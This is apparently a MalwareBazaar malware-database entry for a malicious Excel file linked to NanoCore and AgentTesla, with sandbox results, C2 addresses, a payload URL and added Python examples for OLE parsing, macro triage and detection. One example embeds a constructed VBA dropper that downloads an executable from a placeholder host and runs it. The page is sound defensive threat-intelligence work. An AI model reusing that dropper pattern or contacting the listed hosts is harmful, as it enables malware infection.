MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 55c32a9bd16c2d9113c92d2b57f2204aee9f1685c0496cea083309bb70d86c6f. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



NanoCore


Vendor detections: 12


Maldoc score: 22



SHA256 hash: 55c32a9bd16c2d9113c92d2b57f2204aee9f1685c0496cea083309bb70d86c6f
SHA3-384 hash: 54c18fc201670ee1dce0fbefa2269913b70daf999b1cfebff445053af2f8f11796257e027db0cbafbdfd32823a92d31a
SHA1 hash: ae03c0d7a946d97b148af77436f7495e0d9096a4
MD5 hash: 2da13a1f88dfb75e1f1a37fc4212adf4
humanhash: chicken-beer-victor-carpet
File name: IMG00120474.xls
Signature: NanoCore
File size: 516'608 bytes
First seen: 2022-10-27 06:40:47 UTC
Last seen: Never
File type: Excel file xls
MIME type: application/vnd.ms-excel
ssdeep: 12288:Sf7+Zft5H0dos08l9ZLB/m9UCNB6xRNZw:STB08lzL9qNB6xRN
TLSH: T12BB4BF6275C18A71E4192B33A9C6710D773EEF239D81AD1B397ABF5C0E367049912B0E
TrID: 46.5% (.XLS) Microsoft Excel sheet (alternate) (56500/1/4)
      26.7% (.XLS) Microsoft Excel sheet (32500/1/3)
      20.1% (.XLS) Microsoft Excel sheet (alternate) (24500/1/2)
      6.5% (.) Generic OLE2 / Multistream Compound (8000/1)
Reporter: abuse_ch
Tags: NanoCore RAT xls


abuse_ch
NanoCore C2:
37.139.128.94:6000

Indicators Of Compromise (IOCs)


Below is a list of indicators of compromise (IOCs) associated with this malware sample.

IOC                  ThreatFox Reference
37.139.128.94:6000   https://threatfox.abuse.ch/ioc/949957/

Office OLE Information


This malware sample appears to be an Office document. The following table provides more information about this document using oletools and oledump.

OLE id
Maldoc score: 22
OLE dump

MalwareBazaar was able to identify 15 sections in this file using oledump:

Section ID   Section size   Section name
1            107 bytes      CompObj
2            244 bytes      DocumentSummaryInformation
3            208 bytes      SummaryInformation
4            335161 bytes   Workbook
5            473 bytes      _VBA_PROJECT_CUR/PROJECT
6            86 bytes       _VBA_PROJECT_CUR/PROJECTwm
7            951 bytes      _VBA_PROJECT_CUR/VBA/Module1
8            991 bytes      _VBA_PROJECT_CUR/VBA/Sheet1
9            162368 bytes   _VBA_PROJECT_CUR/VBA/ThisWorkbook
10           2852 bytes     _VBA_PROJECT_CUR/VBA/_VBA_PROJECT
11           1760 bytes     _VBA_PROJECT_CUR/VBA/__SRP_0
12           209 bytes      _VBA_PROJECT_CUR/VBA/__SRP_1
13           1003 bytes     _VBA_PROJECT_CUR/VBA/__SRP_2
14           390 bytes      _VBA_PROJECT_CUR/VBA/__SRP_3
15           564 bytes      _VBA_PROJECT_CUR/VBA/dir
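The section list above is what oledump recovers from the document's OLE2 (compound file) directory: every entry is a stream, and the `_VBA_PROJECT_CUR/VBA/...` paths are streams nested under storages. As an added example (not MalwareBazaar's, oledump's or olefile's code), the Python below builds a small constructed compound file with the same `Workbook` and `_VBA_PROJECT_CUR/VBA/ThisWorkbook` layout and then parses it from the raw bytes: header, FAT, directory tree, stream paths, and a flag for VBA storages. The builder, stream contents and function names are assumptions made for the example; the constants and field offsets are those of the [MS-CFB] format. Small streams that live in the mini stream are listed but deliberately not read, since the builder does not model the mini FAT.

```python
import struct

# Constants from the [MS-CFB] compound file specification.
CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
ENDOFCHAIN, FREESECT, FATSECT, NOSTREAM = 0xFFFFFFFE, 0xFFFFFFFF, 0xFFFFFFFD, 0xFFFFFFFF
TYPE_STORAGE, TYPE_STREAM, TYPE_ROOT = 1, 2, 5
SECTOR = 512         # version 3 compound files use 512-byte sectors
MINI_CUTOFF = 4096   # streams smaller than this live in the mini stream, not the FAT


def _dir_entry(name, obj_type, left=NOSTREAM, right=NOSTREAM, child=NOSTREAM,
               start=ENDOFCHAIN, size=0):
    """Pack one 128-byte directory entry (name, type, tree links, chain start, size)."""
    raw = name.encode("utf-16-le") + b"\x00\x00"
    return struct.pack("<64sHBBIII16sIQQIQ", raw.ljust(64, b"\x00"), len(raw), obj_type,
                       1, left, right, child, b"\x00" * 16, 0, 0, 0, start, size)


def build_cfb(workbook, thisworkbook):
    """Constructed document: a Workbook stream plus _VBA_PROJECT_CUR/VBA/ThisWorkbook.
    Sector 0 is the FAT, sectors 1-2 the directory, then the two stream chains. Each
    stream is padded to at least MINI_CUTOFF so it is FAT-chained (assumption: the
    mini stream real documents use for small streams is not modelled)."""
    fat, body, chains = [FATSECT, 2, ENDOFCHAIN], b"", []
    for s in (workbook, thisworkbook):
        padded = s.ljust(max(MINI_CUTOFF, -(-len(s) // SECTOR) * SECTOR), b"\x00")
        start, n = len(fat), len(padded) // SECTOR
        fat += list(range(start + 1, start + n)) + [ENDOFCHAIN]
        chains.append((start, max(len(s), MINI_CUTOFF)))
        body += padded
    directory = b"".join([
        _dir_entry("Root Entry", TYPE_ROOT, child=1),
        _dir_entry("Workbook", TYPE_STREAM, right=2, start=chains[0][0], size=chains[0][1]),
        _dir_entry("_VBA_PROJECT_CUR", TYPE_STORAGE, child=3),
        _dir_entry("VBA", TYPE_STORAGE, child=4),
        _dir_entry("ThisWorkbook", TYPE_STREAM, start=chains[1][0], size=chains[1][1]),
    ]).ljust(2 * SECTOR, b"\x00")
    header = struct.pack("<8s16sHHHHH6sIIIIIIIII", CFB_MAGIC, b"\x00" * 16, 0x3E, 3, 0xFFFE,
                         9, 6, b"\x00" * 6, 0, 1, 1, 0, MINI_CUTOFF, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    header += struct.pack("<109I", 0, *([FREESECT] * 108))   # DIFAT: the FAT is sector 0
    fat_sector = struct.pack("<128I", *(fat + [FREESECT] * (128 - len(fat))))
    return header + fat_sector + directory + body


def _chain(fat, start):
    """Follow a FAT chain; stops at ENDOFCHAIN/FREESECT, loops, or out-of-range ids."""
    seen, out = set(), []
    while start < len(fat) and start not in seen:
        seen.add(start)
        out.append(start)
        start = fat[start]
    return out


def parse_cfb(data):
    """Read header, FAT and directory; returns (sector_size, fat, entries, mini_cutoff).
    Only the 109 DIFAT slots in the header are followed (enough for files under ~7 MB)."""
    if data[:8] != CFB_MAGIC:
        raise ValueError("not an OLE2 compound file")
    sec = 1 << struct.unpack_from("<H", data, 30)[0]
    first_dir, _, cutoff = struct.unpack_from("<III", data, 48)
    fat = []
    for sid in struct.unpack_from("<109I", data, 76):
        if sid == FREESECT:
            break
        fat.extend(struct.unpack_from("<%dI" % (sec // 4), data, (sid + 1) * sec))
    raw = b"".join(data[(s + 1) * sec:(s + 2) * sec] for s in _chain(fat, first_dir))
    entries = []
    for off in range(0, len(raw) - 127, 128):
        e = raw[off:off + 128]
        name_len, obj_type = struct.unpack_from("<HB", e, 64)
        left, right, child = struct.unpack_from("<III", e, 68)
        start, size = struct.unpack_from("<IQ", e, 116)
        entries.append({"name": e[:max(name_len - 2, 0)].decode("utf-16-le", "replace"),
                        "type": obj_type, "left": left, "right": right, "child": child,
                        "start": start, "size": size})
    return sec, fat, entries, cutoff


def _tree(entries):
    """In-order walk of the directory red-black tree; returns [(path, entry)]."""
    out, seen = [], set()

    def walk(idx, prefix):
        if idx == NOSTREAM or idx >= len(entries) or idx in seen:
            return
        seen.add(idx)
        e = entries[idx]
        walk(e["left"], prefix)
        out.append((prefix + e["name"], e))
        if e["type"] == TYPE_STORAGE:
            walk(e["child"], prefix + e["name"] + "/")
        walk(e["right"], prefix)

    if entries:
        walk(entries[0]["child"], "")
    return out


def list_streams(data):
    """oledump-style listing: [(path, size)] for every stream in the document."""
    _, _, entries, _ = parse_cfb(data)
    return [(p, e["size"]) for p, e in _tree(entries) if e["type"] == TYPE_STREAM]


def vba_streams(data):
    """Paths under a 'VBA' storage (Excel: _VBA_PROJECT_CUR/VBA/..., Word: Macros/VBA/...)."""
    return [p for p, _ in list_streams(data) if "/VBA/" in "/" + p]


def read_stream(data, path):
    """Bytes of a FAT-chained stream; small (mini stream) streams are not followed here."""
    sec, fat, entries, cutoff = parse_cfb(data)
    e = dict(_tree(entries))[path]
    if e["size"] < cutoff:
        raise NotImplementedError("stream lives in the mini stream; not handled in this example")
    raw = b"".join(data[(s + 1) * sec:(s + 2) * sec] for s in _chain(fat, e["start"]))
    return raw[:e["size"]]
```

Against a real sample, `vba_streams` answers the first question an analyst asks of an .xls ("does it carry a VBA project at all?") without decompressing anything; the module source itself is stored in the MS-OVBA compressed container, which is what olevba decompresses in the next section.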
OLE vba

MalwareBazaar was able to extract and deobfuscate the following information from VBA script(s) in OLE objects embedded in this file using olevba:

Type        Keyword             Description
AutoExec    AutoOpen            Runs when the Word document is opened
AutoExec    Workbook_Open       Runs when the Excel Workbook is opened
IOC         svchost.exe         Executable file name
IOC         IMG00120474.exe     Executable file name
Suspicious  Open                May open a file
Suspicious  write               May write to a file (if combined with Open)
Suspicious  Adodb.Stream        May create a text file
Suspicious  savetofile          May create a text file
Suspicious  Shell               May run an executable file or a system command
Suspicious  WScript.Shell       May run an executable file or a system command
Suspicious  Run                 May run an executable file or a system command
Suspicious  CreateObject        May create an OLE object
Suspicious  Microsoft.XMLHTTP   May download files from the Internet
Suspicious  Hex Strings         Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)
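The table above is olevba's keyword triage: auto-execution hooks, suspicious API names, file-name and URL IOCs, and a note that hex-encoded strings were present. As an added example (not MalwareBazaar's or olevba's code, and not the sample's real macro, which this page does not show), the Python below reproduces that triage on a constructed macro written to mirror the indicators in the table: a `Workbook_Open` hook, `Microsoft.XMLHTTP` download, `Adodb.Stream` `savetofile`, `WScript.Shell` `Run`, and a hex-obfuscated file name. The placeholder URL, the `HexToStr` helper name and the keyword subset are assumptions; the point it adds over the table is that IOC extraction is run over the decoded hex strings as well, so `svchost.exe` is reported even though it never appears in clear text.

```python
import re

# Keyword tables modelled on olevba's categories (a subset, reproduced for this example).
AUTOEXEC = {
    "AutoOpen": "Runs when the Word document is opened",
    "Document_Open": "Runs when the Word document is opened",
    "Auto_Open": "Runs when the Excel Workbook is opened",
    "Workbook_Open": "Runs when the Excel Workbook is opened",
}
SUSPICIOUS = {
    "Open": "May open a file",
    "write": "May write to a file (if combined with Open)",
    "Adodb.Stream": "May create a text file",
    "savetofile": "May create a text file",
    "Shell": "May run an executable file or a system command",
    "WScript.Shell": "May run an executable file or a system command",
    "Run": "May run an executable file or a system command",
    "CreateObject": "May create an OLE object",
    "Microsoft.XMLHTTP": "May download files from the Internet",
    "Environ": "May read system environment variables",
}
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
EXE_RE = re.compile(r"\b[\w\-\[\]]+\.(?:exe|dll|scr|vbs|bat|ps1)\b", re.I)
HEX_RE = re.compile(r"\"((?:[0-9A-Fa-f]{2}){4,})\"")   # quoted literal of 4+ hex bytes

# Constructed macro mirroring the indicators in the table above (not the sample's real code).
# HexToStr stands in for a hex-decoding helper such a macro would define itself (assumption).
SAMPLE_MACRO = r'''
Private Sub Workbook_Open()
    Dim http, stream, sh, target
    Set http = CreateObject("Microsoft.XMLHTTP")
    http.Open "GET", "http://example.invalid/ups/IMG00120474.exe", False
    http.Send
    Set stream = CreateObject("Adodb.Stream")
    stream.Type = 1
    stream.Open
    stream.write http.responseBody
    target = Environ("TEMP") & "\" & HexToStr("737663686F73742E657865")
    stream.savetofile target, 2
    Set sh = CreateObject("WScript.Shell")
    sh.Run target, 0, False
End Sub
'''


def _keyword_hits(code, table, label):
    """Case-insensitive whole-word match of each table keyword in the VBA source."""
    return [(label, kw, desc) for kw, desc in table.items()
            if re.search(r"\b" + re.escape(kw) + r"\b", code, re.I)]


def decode_hex_strings(code):
    """Decode quoted hex literals (what olevba shows with --decode); keep printable ASCII only."""
    out = []
    for h in HEX_RE.findall(code):
        raw = bytes.fromhex(h)
        if all(32 <= b < 127 for b in raw):
            out.append(raw.decode("ascii"))
    return out


def analyze_vba(code):
    """Return olevba-style rows (type, keyword, description). IOCs are extracted from
    the source and from the decoded hex strings, so obfuscated file names surface too."""
    rows = _keyword_hits(code, AUTOEXEC, "AutoExec") + _keyword_hits(code, SUSPICIOUS, "Suspicious")
    decoded = decode_hex_strings(code)
    if decoded:
        rows.append(("Suspicious", "Hex Strings",
                     "Hex-encoded strings were detected, may be used to obfuscate strings"))
    haystack = code + "\n" + "\n".join(decoded)
    rows += [("IOC", u, "URL") for u in URL_RE.findall(haystack)]
    rows += [("IOC", x, "Executable file name") for x in EXE_RE.findall(haystack)]
    seen, unique = set(), []
    for r in rows:                      # de-duplicate while keeping table order
        if r not in seen:
            seen.add(r)
            unique.append(r)
    return unique
```

Keyword hits are only an indicator, as the olevba descriptions ("May ...") make clear; it is the combination seen here, an auto-exec hook plus HTTP download plus a file write plus a shell launch, that justifies the maldoc verdict rather than any single keyword.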

Intelligence


File Origin
# of uploads: 1
# of downloads: 291
Origin country: n/a

Vendor Threat Intelligence
Malware family: n/a
ID: 1
File name: IMG00120474.xls
Verdict: Malicious activity
Analysis date: 2022-10-27 06:43:10 UTC
Tags: macros macros-on-open

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Result
Verdict: Malware
Maliciousness:
Behaviour
Searching for the window
Creating a window
Creating synchronization primitives
Creating a file in the %temp% directory
Searching for synchronization primitives
Creating a file
Enabling the 'hidden' option for files in the %temp% directory
Launching a process
Query of malicious DNS domain
Sending an HTTP GET request to an infection source by exploiting the app vulnerability
Creating a process from a recently created file
Result
Verdict: Malicious
File Type: Legacy Excel File with Macro
Payload URLs
URL                                                                             File name
http://oslobikerental.no.ww18.online4u.no/wp-includes/ID2/ups/IMG00120474.exe   ThisWorkbook
Behaviour
BlacklistAPI detected
Label: Malicious
Suspicious Score: 7.6/10
Score Malicious: 76%
Score Benign: 24%
Result
Verdict: MALICIOUS
Details
Macro with Startup Hook
Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.
Macro with File System Write
Detected macro logic that can write data to the file system.
Macro Contains Suspicious String
Detected a macro with a suspicious string. Suspicious strings include privileged function calls, obfuscations, odd registry keys, etc...
Result
Threat name: Unknown
Detection: malicious
Classification: expl.evad
Score: 100 / 100
Signature
Antivirus detection for dropped file
Antivirus detection for URL or domain
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Found API chain indicative of sandbox detection
Machine Learning detection for sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office process drops PE file
Snort IDS alert for network traffic
Yara detected AntiVM autoit script
Behaviour
Behavior Graph (ID 731676; sample IMG00120474.xls; start date 27/10/2022; architecture WINDOWS; score 100)
Top-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 12 other signatures
Process tree, dropped files and per-process signatures as shown in the graph:

EXCEL.EXE
    network: oslobikerental.no.ww18.online4u.no (213.160.235.113, port 49171 -> 80, ASN-CATCHCOMNO, Norway)
    dropped: C:\Users\user\AppData\Local\...\svchost.exe (PE32)
    dropped: C:\Users\user\AppData\...\IMG00120474[1].exe (PE32)
    dropped: C:\Users\user\Desktop\IMG00120474.xls (Composite)
    signature: Document exploit detected (creates forbidden files)
    -> svchost.exe
        dropped: C:\Users\user\AppData\Local\Temp\...\gst.exe (PE32)
        dropped: C:\Users\user\AppData\...\fwlpehujtj.exe (PE32)
        signature: Multi AV Scanner detection for dropped file
        -> gst.exe
            dropped: C:\Users\user\AppData\Local\...\akfng.exe (PE32)
            signature: Multi AV Scanner detection for dropped file
            -> wscript.exe
                -> akfng.exe
                    dropped: C:\Users\user\AppData\Local\...\start.vbs (ASCII)
                    signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Creates autostart registry keys with suspicious values (likely registry only malware); Creates multiple autostart registry keys
        -> wscript.exe
            -> fwlpehujtj.exe
                dropped: C:\Users\user\AppData\Local\...\start.vbs (ASCII)
                signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Creates autostart registry keys with suspicious values (likely registry only malware); 2 other signatures
wscript.exe (second top-level instance)
    -> cmd.exe
        -> fwlpehujtj.exe
wscript.exe (third top-level instance)
    -> cmd.exe
        -> fwlpehujtj.exe
3 other processes
    -> cmd.exe
        -> akfng.exe
    -> cmd.exe
        -> akfng.exe
Threat name: Document-Word.Trojan.Valyria
Status: Malicious
First seen: 2022-10-27 03:11:45 UTC
File Type: Document
Extracted files: 20
AV detection: 17 of 39 (43.59%)
Threat level: 5/5
Result
Malware family: agenttesla
Score: 10/10
Tags: family:agenttesla collection keylogger macro macro_on_action persistence spyware stealer trojan
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
outlook_office_path
outlook_win_path
Office loads VBA resources, possible macro or embedded object present
Enumerates physical storage devices
Suspicious use of SetThreadContext
Accesses Microsoft Outlook profiles
Adds Run key to start application
Looks up external IP address via web service
Checks computer location settings
Drops startup file
Loads dropped DLL
Downloads MZ/PE file
Executes dropped EXE
AgentTesla
Malware Config
C2 Extraction: http://107.189.4.253/boots/inc/a155b6dca5b411.php
Verdict: Suspicious
Tags: n/a
YARA: n/a
Please note that we are no longer able to provide a coverage score for Virus Total.
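The sandbox results above agree on a chain that endpoint telemetry can catch at several points: EXCEL.EXE writes a PE named svchost.exe under the user profile and launches it, the payload stages a `start.vbs` and sets autostart Run keys, and the host talks to the C2 listed in the IOC section. As an added example (not MalwareBazaar's code and not any of the sandboxes' signature logic), the Python below runs a few such rules over a constructed, Sysmon-shaped event list (EventID 1 process create, 3 network connect, 11 file create, 13 registry value set, 22 DNS query). The C2 `37.139.128.94:6000` and the payload host `oslobikerental.no.ww18.online4u.no` are the ones on this page; the rule names, event field names, file paths and the benign noise events are assumptions for the example.

```python
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
DROPPED = r"C:\Users\user\AppData\Local\Temp\svchost.exe"
SYS_SVCHOST = r"C:\Windows\System32\svchost.exe"

# Constructed events in a Sysmon-like shape; not a real log from the sandboxes above.
EVENTS = [
    {"id": 1, "pid": 100, "image": EXCEL, "parent": r"C:\Windows\explorer.exe"},
    {"id": 22, "pid": 100, "image": EXCEL, "query": "oslobikerental.no.ww18.online4u.no"},
    {"id": 11, "pid": 100, "image": EXCEL, "target": DROPPED},
    {"id": 1, "pid": 200, "image": DROPPED, "parent": EXCEL},
    {"id": 13, "pid": 200, "image": DROPPED,
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\start",
     "value": r"wscript.exe C:\Users\user\AppData\Local\start.vbs"},
    {"id": 3, "pid": 200, "image": DROPPED, "dst_ip": "37.139.128.94", "dst_port": 6000},
    # benign noise: the real svchost.exe, started by services.exe, talking TLS (TEST-NET address)
    {"id": 1, "pid": 300, "image": SYS_SVCHOST, "parent": r"C:\Windows\System32\services.exe"},
    {"id": 3, "pid": 300, "image": SYS_SVCHOST, "dst_ip": "192.0.2.10", "dst_port": 443},
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
C2_IOCS = {("37.139.128.94", 6000)}                       # NanoCore C2 from the IOC table above
PAYLOAD_DOMAINS = {"oslobikerental.no.ww18.online4u.no"}  # payload URL host from the sandbox result
SYSTEM_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "explorer.exe", "wininit.exe"}
PE_EXT = (".exe", ".dll", ".scr")


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _user_writable(path):
    p = path.lower()
    return "\\appdata\\" in p or "\\temp\\" in p or "\\users\\public\\" in p


def detect(events):
    """Single pass over time-ordered events; returns [(rule, detail)].
    'dropped' remembers PE files written by Office so a later process start
    from that exact path can be tied back to the document."""
    findings, dropped = [], {}
    for e in events:
        image = _base(e["image"])
        if e["id"] == 11 and image in OFFICE and e["target"].lower().endswith(PE_EXT):
            dropped[e["target"].lower()] = image
            findings.append(("office_drops_pe", e["target"]))
            # a system binary name outside C:\Windows is the "benign system name" trick
            if _base(e["target"]) in SYSTEM_NAMES and not e["target"].lower().startswith("c:\\windows\\"):
                findings.append(("pe_with_benign_system_name", e["target"]))
        elif e["id"] == 1:
            if _base(e["parent"]) in OFFICE and _user_writable(e["image"]):
                findings.append(("office_spawns_from_user_dir", e["image"]))
            if e["image"].lower() in dropped:
                findings.append(("process_from_dropped_file", e["image"]))
        elif e["id"] == 13 and "\\currentversion\\run" in e["key"].lower() and _user_writable(e["value"]):
            findings.append(("autostart_run_key_to_user_dir", e["value"]))
        elif e["id"] == 3 and (e["dst_ip"], e["dst_port"]) in C2_IOCS:
            findings.append(("known_c2_connection", "%s:%d" % (e["dst_ip"], e["dst_port"])))
        elif e["id"] == 22 and e["query"].lower() in PAYLOAD_DOMAINS:
            findings.append(("payload_domain_lookup", e["query"]))
    return findings


def triggered_rules(events):
    """Distinct rule names that fired, sorted, for scoring or alert de-duplication."""
    return sorted({rule for rule, _ in detect(events)})
```

The behavioural rules (Office writing a PE, Office child from a user-writable path, Run key pointing into AppData) survive a change of C2 or payload host, whereas the two IOC rules stop firing the moment the operator rotates infrastructure; both kinds are worth having, but only the first kind would have caught this chain on day one.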

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: BitcoinAddress
Author: Didier Stevens (@DidierStevens)
Description: Contains a valid Bitcoin address
Rule name: informational_win_ole_protected
Author: Jeff White (karttoon@gmail.com) @noottrak
Description: Identify OLE Project protection within documents.
Rule name: malware_shellcode_hash
Author: JPCERT/CC Incident Response Group
Description: detect shellcode api hash value
Rule name: meth_get_eip
Author: Willi Ballenthin
Rule name: pdb_YARAify
Author: @wowabiy314
Description: PDB

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments